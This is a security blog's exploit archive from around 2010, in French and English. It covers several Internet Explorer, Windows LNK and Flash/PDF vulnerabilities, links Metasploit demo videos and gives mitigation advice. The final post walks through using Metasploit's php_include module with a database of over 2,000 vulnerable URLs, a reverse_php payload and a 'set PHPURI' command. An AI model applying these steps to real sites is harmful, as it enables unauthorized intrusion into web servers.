Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2010-3962, le 0day confidentiel Internet Explorer ne l’est plus

Nous vous annoncions, il y a 2 jours, la découverte d’un nouveau “0day” ciblant les versions d’Internet Explorer 6, 7 et 8 sous différentes plate-formes Windows. Ce “0day” restait encore confidentiel, car entre les mains de Microsoft, de Symantec et d’autres professionnels de la sécurité informatique.

Dans son blog Microsoft donnait des détails sur la cause de la vulnérabilité. Internet Explorer aurait un soucis de gestion de mémoire lors de la combinaison de certaines feuilles de styles “CSS” et citait une “DLL” vulnérable.

Il ne fallait pas plus d’informations pour que d’autres chercheurs, qui n’était pas dans la confidence, se mettent à investiguer plus en détail la cause afin de pouvoir créer un “PoC” grand public. Bingo ! Moins d’une journée après l’annonce officielle de la vulnérabilité, un “PoC” était mis à disposition sur Internet, rendant cette vulnérabilité, à l’origine très limitée en impact, en une vulnérabilité pouvant affecter des millions d’ordinateurs.

Ci-dessous un vidéo maison, vous démontrons la simplicité d’exploitation de cette vulnérabilité.

Nous pensions aussi que la correction de la vulnérabilité serait incluse dans le cycle normal de mise à jour Microsoft, normalement prévu tous les deuxièmes mardi du mois. Mais malheureusement, la correction de cette nouvelle vulnérabilité n’est pas incluse dans l’annonce avancée des mises à jour prévues pour Mardi 9 Novembre.

Il faudra sûrement attendre une mise à jour “out-of-band” (hors cycle) entre le 9 Novembre et la prochaine mise à jour cyclique qui aura lieu le 14 Décembre.

En attendant, nous conseillons aux internautes d’utiliser “Enhanced Mitigation Experience Toolkit v2.0” (EMET) de Microsoft afin de limiter la portée vulnérabilité.

MS10-046 : Microsoft Windows Shell LNK Execution

Since the 19 July, the Rapid 7 Metasploit team has release an exploit module for Windows Shell LNK exploit MSA-2286198, aka CVE-2010-2568. Actually the exploitation of this vulnerability is not widely exploited, but the situation could change rapidly soon. As you surely know, SANS ISC has increase his threat warning level to yellow over this vulnerability.

We have successfully test the exploit on Windows XP Pro SP3 fully patched.

Here bellow a video we have done, to demonstrate how it is easy to exploit this vulnerability with Metasploit.

[youtube rYrXDJfVLJ0]

CVE-2010-1297 : Adobe Flash Player newfunction Invalid Pointer Use

Since yesterday, the Rapid 7 Metasploit team has release an exploit module for Adobe Flash exploit APSA10-01, aka CVE-2010-1297.

The vulnerability affects Adobe Flash 10.0.45.2, 9.0.262, and earlier 10.0.x and 9.0.x versions for Windows, Macintosh, Linux and Solaris, but also Adobe Reader and Acrobat 9.3.2 and earlier 9.x versions for Windows, Macintosh and UNIX. This vulnerability could crash or allow an attacker to take control of the affected system.

So, as I understand, all Internet could own all Internet, a big party in perspective. How is not using Flash ?

The actual attack transmission vector is done between a crafted PDF file embedding a vulnerable Flash animation. So, if you are downloading these kind of PDFs from Internet, or open emails with attached PDF, and open it with Adobe Reader you could be owned.

We have successfully test the exploit with Adobe Reader 9.3.0 on Internet Explorer 8, Safari 5.

No results with Google Chrome 5.0.375.70 and Firefox 3.5.9.

With Foxit Reader the PDF is not lunching the Flash animation, so the exploit is not working.

Adobe has release updates for Flash Player, APSB10-14, so don’t hesitate to update your browsers add-ons.

Here under a video we have done, to demonstrate how it is easy to exploit this vulnerability with Metasploit.

[youtube JW7B8aZsT88]

Playing with Remote File Inclusion in Metasploit

Exploiting Remote File Inclusion (RFI) through Metasploit is a kid game. The 29 January 2010, RSnake has release a database of more than 2000 Remote File  Inclusion vulnerable URL’s. This RFI vulnerable database was compiled mainly from Milw0rm and OSVDB, and integrated the 15 February 2010 by HD Moore into Metasploit with the objective to be integrated into the already existing “php_include” exploit.

All the URLs present into the database are finished with “XXpathXX” how will execute the desired payload, for example “reverse_php“.

If you don’t specify any specific RFI target the RFI database will be used by default. To focus on a specific URL, just set PHPURI to the desired URL and finish they with “XXpathXX“. For example :

set PHPURI /index.php?COLOR=XXpathXX

When you check the HTTP Server log, you will see the related RFI attempts, but no way to distinguish RFI bot scan to Metasploit scan, no specific user agent by default is provided by Metasploit for “php_include” exploit. You can configure one, by setting the advanced configurations of the exploit (show advanced). To setup a specific user agent is interesting to create specific IDS rules in order to detect the tool how has create theses attempts during an QA for example.

The RFI database integrated into Metasploit is actually 3 months old, and don’t represent any more the existing exploits, but you have the facility to create your own database and use it.

[youtube u6F-O32BR_Y]